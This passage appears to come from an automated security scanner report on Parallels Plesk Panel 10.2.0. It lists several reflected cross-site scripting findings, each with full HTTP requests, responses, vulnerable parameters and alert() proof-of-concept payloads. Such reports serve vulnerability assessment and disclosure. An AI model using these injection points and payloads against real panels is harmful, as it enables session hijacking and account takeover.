id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"><DIV class="msg-box msg-info"><DIV><DIV><DIV><DIV><DIV><DIV class="msg-content"><SPAN class="title">Information:&nbsp;</SPAN>Backing up of domain vulnerable.host.fqdn was scheduled.</DIV></DIV></DIV></DIV></DIV></DIV></DIV><DIV class="msg-box msg-error"><DIV><DIV><DIV><DIV><DIV><DIV class="msg-content"><SPAN class="title">Error:&nbsp;</SPAN>Some fields are empty or contain an improper value.</DIV></DIV></DIV></DIV></DIV></DIV></DIV></div>


<form action="/plesk/client@2/domain@1/backup/create/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="formArea">
<fieldset><legend>Backup settings</legend><table class="formFields" cellspacing="0" width="100%">

   <tr id="row-prefix">
       <td class="name"><label for="fid-prefix">Add prefix to backup name</td>
       <td><input type="text" name="prefix" id="fid-prefix" value="bak" size="30" ></td>
   </tr>
   <tr id="row-comment">
       <td class="name"><label for="fid-comment">Comments</td>
       <td><textarea class='comment' name="comment" id="fid-comment" rows="5" cols="50" wrap="off">Domain backup.
Creation date: May 23, 2011 02:39 PM</textarea>
       </td>
   </tr>
   
   <tr id="row-split_backup_size">
       <td class="name"><label for="fid-split_backup_checkbox">Create multivolume backup</label></td>
       <td>
           <input type="checkbox" class="checkbox" name="split_backup_checkbox" id="fid-split_backup_checkbox" />
           <input type="hidden" id="fid-split_backup" name="split_backup" value="" />
           <label for="fid-split_backup_size">Volume size&nbsp;</label>
           <input type="text" name="split_backup_size" id="fid-split_backup_size" value="2047" size=8 maxlength=8 />MB
       </td>
   </tr>

   <tr id="row-repository">
       <td class="name">Store backup in</td>
       <td>

           <div class="option"><input name="repository" id="fid-store_repository-local" value="local" type="radio" class="radiobox" checked>&nbsp;<label for="fid-store_repository-local">Server repository</label></div>


           <div class="option"><input name="repository" id="fid-store_repository-ftp" value="ftp" type="radio" class="radiobox" disabled>&nbsp;<label for="fid-store_repository-ftp">Personal FTP repository</label><span class="hint"> (FTP repository settings are not specified)</span>


           </div>
       </td>
   </tr>
   
   <tr id="row-email">
       <td class="name"><label for="fid-email">When backup task is completed, send notification e-mail to</label></td>
       <td><input type="text" name="email" id="fid-email" value="a42c4"><script>alert(1)</script>e3e36e04876dbfe97" size="30" maxlength="254"></td>
   </tr>
   
</table></fieldset>

<fieldset><legend>Backup content</legend><table class="formFields" cellspacing="0" width="100%">

   <tr>
       <td class="name">Back up</td>
       <td>
           <div class="option"><input name="content" id="fid-backup_content_configuration" value="configuration" type="radio" class="radiobox" />&nbsp;<label for="fid-backup_content_configuration">
               Domain configuration
           </label></div>
           <div class="option"><input name="content" id="fid-backup_content_all" value="configuration_and_content" type="radio" class="radiobox" checked />&nbsp;<label for="fid-backup_content_all">
               Domain configuration and content
           </label>&nbsp;<select name="content_type" id="fid-content_type" >    <option value='backup_content_all_at_domain' SELECTED>All configuration and content</option>
   <option value='backup_content_vhost_only'>All configuration and content except mail</option>
   <option value='backup_content_mail_only'>Only mail configuration and content</option>
</select>
</div>
       </td>
   </tr>


   <tr>
       <td class="name"><label for="fid-suspend_domain_checkbox">Suspend domain until backup task is completed</label></td>
       <td class="withWarning"><input type="checkbox" class="checkbox" name="suspend_domain_checkbox" id="fid-suspend_domain_checkbox" value="true" />
       <input type="hidden" id="fid-suspend" name="suspend" value="" />
       <span id='suspend_domain_warning' style="display:none;" class="warningHint">Domain will be unavailable during the backup process</span>
       </td>
   </tr>


</table></fieldset>
</div>


   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote"></td>
           <td class="misc" width="0" nowrap><DIV class="commonButton" id="bid-backup-now" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to back up data.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;" style=""><BUTTON name="bname_backup_now" id="buttonid-backup-now" type="button" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;">Back Up</BUTTON><SPAN id="spanid-backup-now">Back Up</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to cancel backup creation and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></td>
       </tr></table>
   </div>


</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

2.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/ [cmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The value of the cmd request parameter is copied into the HTML document as plain text between tags. The payload f81a3<script>alert(1)</script>c73b22d853a was submitted in the cmd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/?cmd=chdirf81a3<script>alert(1)</script>c73b22d853a&file=/httpdocs HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:27:43 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:27:43 GMT
Connection: close
Content-Length: 746

ERROR: PleskFatalException
Command not found: chdirf81a3<script>alert(1)</script>c73b22d853a

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/client@2/register-domain/_73f7e"><a>dd81af60b61

0: common_func.php3:62
   psaerror(string 'Command not found: chdirf81a3<script>alert(1)</script>c73b22d853a')
1: cList.php:162
   cList->setFSP(string 'chdirf81a3<script>alert(1)</script>c73b22d853a')
2: FileManagerUIPointer.php:722
   FileManagerUIPointer->accessItem(string 'GET', NULL null)
3: client.domain.hosting.file-manager.php:87
   plesk__client__domain__hosting__file_manager->accessItem(string 'GET', NULL null)
4: UIPointer.php:600
   UIPointer->access(string 'GET')
5: plesk.php:47

2.5. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/ [wizard parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@new/properties/

Issue detail

The value of the wizard request parameter is copied into the HTML document as plain text between tags. The payload a309d<script>alert(1)</script>1bfb6397ff22ab924 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /plesk/client@2/domain@1/odbc/dsn@new/properties/?name=%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%256&description=xss&driver=SQL+Server&forgery_protection_token=dc1721730e046f7e1de14c19e4a424be&cmd=update&lock=true&previous_page=%0d&wizstep=1&wizard=%2fplesk%2fclient@2%2fdomain@1%2fodbc%2fdsn@new%2fproperties%2fa309d%3cscript%3ealert%281%29%3c%2fscript%3e1bfb6397ff22ab924&wizaction=%0d HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:11:24 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:11:24 GMT
Connection: close
Content-Length: 834

ERROR: PleskBadURIException
Invalid URI: /plesk/client@2/domain@1/odbc/dsn@new/properties/a309d<script>alert(1)</script>1bfb6397ff22ab924

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/client@2/domain@1/odbc/dsn@new/properties/a309d<script>alert(1)</script>1bfb6397ff22ab924

0: UIPointer.php:49
   UIPointer::parse(string '/plesk/client@2/domain@1/odbc/dsn@new/properties/a309d<script>alert(1)</script>1bfb6397ff22ab924')
1: common_func.php3:3913
   wizard_get()
2: Abstract.php:81
   Form_Abstract->__construct()
3: ODBCDSNPropertiesUIPointer.php:56
   ODBCDSNPropertiesUIPointer->_accessNewOdbc()
4: ODBCDSNPropertiesUIPointer.php:17
   ODBCDSNPropertiesUIPointer->accessItem(string 'GET', NULL null)
5: UIPointer.php:600
   UIPointer->access(string 'GET')
6: plesk.php:47

2.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/download-progress/catalogId/marketplace/taskId/2 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/download-progress/catalogId/marketplace/taskId/2

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7cc51(a)0b7b6224a5b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /smb/app/download-progress/catalogId/marketplace/taskId/27cc51(a)0b7b6224a5b HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/market/id/marketplace
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=483627fb8a4e908eab18dad06863ab2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 23:00:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 23:00:09 GMT
Connection: close
Content-Length: 8768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="79f421900086c1962424e05d36c92e2a" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/apscatalog.js?1302230704"></script>
<title>Downloading application - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/app/action-name/download-progress" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fapp%2Fdownload-progress%2FcatalogId%2Fmarketplace%2FtaskId%2F27cc51%28a%290b7b6224a5b' + '&activeModule=' + 'applicationsAndServices' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"active","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Downloading application <b></b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<p>The application is being downloaded for installation now. Clicking any tab above will cancel the installation of this application.</p>
<script type="text/javascript">
Jsw.onReady(function() {
new Jsw.Panel({
renderTo: 'main',
cls: 'progress-bar-box',
items: [
new Smb.ApsCatalogDownloadBar({
locale: {"progress":"%%percents%%% completed"},
taskId: 27cc51(a)0b7b6224a5b,
catalogId: 'marketplace',
baseUrl: '/smb',
redirectUrl: "/app/select/packageId/%packageId%"
})
]
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

2.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/create

Issue detail

The value of the autoResponder%5BautoResponderSection%5D%5BcontentType%5D request parameter is copied into the HTML document as plain text between tags. The payload 8fa96<img%20src%3da%20onerror%3dalert(1)>6bd6b053919 was submitted in the autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter. This input was echoed as 8fa96<img src=a onerror=alert(1)>6bd6b053919 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/email-address/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.nosedivesailing.com:8880/smb/email-address/create
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 952

general%5BgeneralSection%5D%5Bname%5D=format-2&general%5BgeneralSection%5D%5Bpostbox%5D=0&general%5BgeneralSection%5D%5Bpostbox%5D=1&general%5BgeneralSection%5D%5BmboxQuotaValue%5D=-1&general-generalSection-mboxQuotaValue-selector=unlimited&general%5BgeneralSection%5D%5Bpassword%5D=thepassword&general%5BgeneralSection%5D%5BpasswordConfirmation%5D=thepassword&redirect%5BredirectSection%5D%5Benabled%5D=0&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc360707%5D%5BaliasName%5D=&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5BdynamicSubFormTemplate%5D%5BaliasName%5D=&autoResponder%5BautoResponderSection%5D%5Benabled%5D=0&autoResponder%5BautoResponderSection%5D%5BcontentType%5D=false8fa96<img%20src%3da%20onerror%3dalert(1)>6bd6b053919&autoResponder%5BautoResponderSection%5D%5BforwardAddress%5D=&autoResponder%5BautoResponderSection%5D%5Battachments%5D%5BdynamicSubFormTemplate%5D%5Bfile%5D=&antivirus%5BantivirusSection%5D%5Benabled%5D=0&hidden=&forgery_protection_token=bdaafe67daaa200e2f077bd9577b09f4

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:52:44 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:52:44 GMT
Connection: close
Content-Length: 317

{"formMessages":{"general":{"generalSection":{"name":{"recordFound":"The specified e-mail address is already in use."}}},"autoResponder":{"autoResponderSection":{"contentType":{"notInArray":"'false8fa96<img src=a onerror=alert(1)>6bd6b053919' was not found in the haystack"}}}},"status":"success","statusMessages":[]}

2.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4 [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/4

Issue detail

The value of the autoResponder%5BautoResponderSection%5D%5BcontentType%5D request parameter is copied into the HTML document as plain text between tags. The payload dc190<img%20src%3da%20onerror%3dalert(1)>5075acf3aba was submitted in the autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter. This input was echoed as dc190<img src=a onerror=alert(1)>5075acf3aba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/email-address/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.nosedivesailing.com:8880/smb/email-address/edit/id/4
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1110

general%5BgeneralSection%5D%5Bname%5D=format-2&general%5BgeneralSection%5D%5Bpostbox%5D=0&general%5BgeneralSection%5D%5Bpostbox%5D=1&general%5BgeneralSection%5D%5BmboxQuotaValue%5D=-1&general-generalSection-mboxQuotaValue-selector=unlimited&general%5BgeneralSection%5D%5Bpassword%5D=&general%5BgeneralSection%5D%5BpasswordConfirmation%5D=&redirect%5BredirectSection%5D%5Benabled%5D=0&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc338289%5D%5BaliasName%5D=hgkhjlkhjlk%2Chj%2Cn&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc468227%5D%5BaliasName%5D=hrsegjoj&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc801714%5D%5BaliasName%5D=&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5BdynamicSubFormTemplate%5D%5BaliasName%5D=&autoResponder%5BautoResponderSection%5D%5Benabled%5D=0&autoResponder%5BautoResponderSection%5D%5BcontentType%5D=falsedc190<img%20src%3da%20onerror%3dalert(1)>5075acf3aba&autoResponder%5BautoResponderSection%5D%5BforwardAddress%5D=&autoResponder%5BautoResponderSection%5D%5Battachments%5D%5BdynamicSubFormTemplate%5D%5Bfile%5D=&antivirus%5BantivirusSection%5D%5Benabled%5D=0&hidden=&forgery_protection_token=bdaafe67daaa200e2f077bd9577b09f4

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:53:23 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:53:23 GMT
Connection: close
Content-Length: 418

{"formMessages":{"aliases":{"aliasesSection":{"aliasesForm":{"c338289":{"aliasName":{"emailAddressInvalid":"The specified e-mail address is not valid. You need to specify a valid e-mail address like user@domain.com."}}}}},"autoResponder":{"autoResponderSection":{"contentType":{"notInArray":"'falsedc190<img src=a onerror=alert(1)>5075acf3aba' was not found in the haystack"}}}},"status":"success","statusMessages":[]}

2.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The value of the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D request parameter is copied into the HTML document as plain text between tags. The payload 67380<img%20src%3da%20onerror%3dalert(1)>3f054407b9e was submitted in the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter. This input was echoed as 67380<img src=a onerror=alert(1)>3f054407b9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/create
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
